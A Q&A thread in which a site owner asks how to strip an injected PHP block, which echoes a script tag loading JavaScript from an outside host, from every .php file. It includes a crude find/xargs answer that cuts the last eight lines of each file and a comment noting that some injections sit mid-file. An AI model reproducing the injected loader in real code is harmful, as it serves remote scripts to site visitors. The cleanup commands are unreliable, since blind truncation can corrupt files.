# Remove malware in php file

Tags: php, malware, virus

All my .php file was appended a block of code like this:

```
<?php
#bbf007#
if(empty($r)) {
$r = "<script type=\"text/javascript\" src=\"http://web-    ask.esy.es/m2nzgpzt.php?id=11101326\"></script>";
echo $r;
}
#/bbf007#
?>
```

I need to write a bash script with regular expression to remove this block out of code file. Please help me a suggestion.

Answer (score 0):

Backup first!

The following will take all but the last 8 lines from all .php files within the current directory and it's subdirectories, and write them to a file called *.php.new:

```
find -name "*.php" | xargs -i sh -c 'head -n -8 {} > {}.new'
```

Then, move all the current php files to *.php.old:

```
find -name "*.php" | xargs -i sh -c 'mv {} {}.old'
```

Then, move the .php.new files to .php

```
find -name "*.php.new" | xargs -i sh -c 'mv {} `echo '{}' | head -c -5`'
```

Comment: Deleting 8 last lines is only available for files appended at end of file but  there are some files have been appended at middle of file content. So I think we have to detect block of malware code and remove then